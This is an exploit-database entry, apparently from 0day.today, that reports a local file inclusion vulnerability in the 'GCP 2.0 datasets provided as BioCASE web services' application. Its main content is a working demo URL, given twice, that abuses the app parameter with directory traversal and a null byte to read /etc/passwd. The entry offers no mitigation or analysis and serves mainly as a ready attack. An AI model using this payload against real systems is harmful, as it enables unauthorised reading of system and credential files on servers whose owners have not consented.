id: 10757
date: 02/02/2010
title: GCP 2.0 datasets provided as BioCASE web services
author: R3VAN_BASTARD
cves: 

=================================================
GCP 2.0 datasets provided as BioCASE web services
=================================================

========================================================================
#   .::GCP 2.0 datasets provided as BioCASE web services::.            #
#                  (Local File Inclusion)                              #
========================================================================
========================================================================
[x] Vulnerability:/index.php?app=
========================================================================
[x] demo:
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
=========================================================================



#  0day.today [2023-03-26]  #